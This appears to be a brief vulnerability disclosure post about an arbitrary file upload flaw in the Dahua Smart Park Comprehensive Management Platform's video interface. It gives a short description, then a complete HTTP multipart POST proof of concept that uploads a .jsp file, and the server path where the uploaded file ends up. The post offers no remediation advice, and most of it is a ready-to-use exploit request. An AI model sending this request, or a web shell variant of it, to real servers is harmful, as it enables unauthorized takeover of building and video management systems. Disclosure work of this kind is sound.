Dahua Smart Park Comprehensive Management Platform Video Any File Upload Vulnerability
Dahua Smart Park Comprehensive Management Platform Video Any File Upload Vulnerability
Dahua Smart Park Comprehensive Management Platform video Any file upload vulnerability
Vulnerability Description
Dahua Smart Park Comprehensive Management Platform Video Interface has a vulnerability to upload any file to the server through the vulnerability, and the attacker can upload any file to the server to control server permissions.
Vulnerability Impact
Dahua Smart Park Comprehensive Management Platform
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /publishing/publishing/material/file/video HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
Test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--
1
/publishingImg/VIDEO/230812152005170200.jsp
This post is licensed under CC BY 4.0 by the author.